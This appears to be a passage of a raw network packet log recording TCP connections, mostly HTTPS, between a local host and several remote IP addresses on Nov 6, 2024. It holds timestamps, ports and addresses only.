                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.344455957 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.344549894 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.371342897 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.378314018 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.378331900 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.387343884 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.393964052 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.393975973 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.424169064 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.441026926 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.455846071 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.455935001 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.456022978 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.456305027 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.456305027 CET49799443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.456321955 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.456331015 CET4434979913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.468364954 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.468396902 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.468897104 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.469316959 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.469331980 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575436115 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575462103 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575470924 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575485945 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575498104 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575505972 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575587988 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575587988 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575617075 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.575927973 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590842009 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590882063 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590889931 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590914965 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590925932 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590945005 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590955973 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590965986 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.590977907 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.591078997 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605230093 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605238914 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605283022 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605314016 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605324030 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605333090 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.605535984 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614378929 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614387035 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614428043 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614464045 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614464045 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614476919 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614500999 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.614545107 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.642870903 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.642992020 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.652039051 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.652050972 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.652280092 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.653709888 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694344044 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694364071 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694421053 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694442034 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694502115 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.694502115 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.695334911 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.708271027 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.708281040 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.708398104 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.708411932 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.708502054 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.721677065 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.721698999 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.721791029 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.721805096 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.721918106 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.723292112 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.723306894 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.723484039 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.723491907 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.723675013 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731239080 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731298923 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731337070 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731359959 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731869936 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731869936 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731888056 CET4434979813.107.253.72192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.731992006 CET49798443192.168.2.513.107.253.72
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.763870001 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.766869068 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.766885996 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.767616034 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.767621040 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825594902 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825623035 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825761080 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825761080 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825778008 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825865030 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825895071 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825901985 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825911045 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825937033 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.825993061 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838566065 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838587999 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838645935 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838661909 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838696003 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.838720083 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839211941 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839235067 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839271069 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839282990 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839307070 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.839334011 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840497017 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840523958 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840584040 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840590954 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840600967 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.840657949 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.841557980 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.841576099 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.841641903 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.841650009 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.841686964 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.849843025 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.850663900 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.850684881 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.851212025 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.851217985 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.856431961 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.856926918 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.856941938 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.857690096 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.857697964 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.894531965 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.894587040 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.894943953 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895411968 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895476103 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895529032 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895777941 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895792961 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895838022 CET49804443192.168.2.5184.28.90.27
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.895843983 CET44349804184.28.90.27192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.896045923 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.896064043 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.896075010 CET49805443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.896080971 CET4434980513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.900369883 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.900398016 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.900465012 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.900865078 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.900881052 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942608118 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942629099 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942686081 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942703009 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942743063 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942850113 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942884922 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942899942 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942908049 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942930937 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942943096 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.942964077 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.944048882 CET49800443192.168.2.513.107.253.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.944061995 CET4434980013.107.253.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.982100964 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.982261896 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.982322931 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.985481977 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.985500097 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.985511065 CET49806443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.985516071 CET4434980613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.989065886 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.989208937 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.989351988 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.993829012 CET49807443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.993839025 CET4434980713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996526003 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996558905 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996624947 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996711016 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996752024 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996819019 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996933937 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.996948957 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.997083902 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:33.997097015 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.237572908 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.244246960 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.244270086 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.244889975 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.244896889 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.375938892 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.376216888 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.376271963 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.668853045 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.708578110 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.734879017 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.736800909 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.755459070 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.755490065 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756004095 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756009102 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756247997 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756263971 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756274939 CET49808443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.756279945 CET4434980813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.762594938 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.762604952 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.763056993 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.763061047 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.764009953 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.764029980 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.764427900 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.764431953 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.774862051 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.774894953 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.774970055 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.775165081 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.775173903 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.882914066 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.882961988 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.883028030 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.883308887 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.883327961 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.883342028 CET49817443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.883346081 CET4434981713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.886934996 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.886964083 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.887106895 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.887305021 CET49822443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.887321949 CET4434982213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890502930 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890551090 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890598059 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890775919 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890786886 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890799046 CET49816443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.890803099 CET4434981613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.893522978 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.893547058 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.893615007 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.893887043 CET49823443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.893901110 CET4434982313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.899028063 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.899080038 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.899122953 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.899291039 CET49814443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.899302006 CET4434981413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.902879953 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.902906895 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.902976990 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.903201103 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:34.903213978 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.158948898 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.503932953 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.505394936 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.505415916 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.506623030 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.506628036 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.631025076 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.631576061 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.631607056 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.632185936 CET49824443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.632190943 CET4434982413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.641638041 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.641694069 CET4434981913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.641921043 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.641995907 CET49819443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:35.641995907 CET49819443192.168.2.513.107.246.45
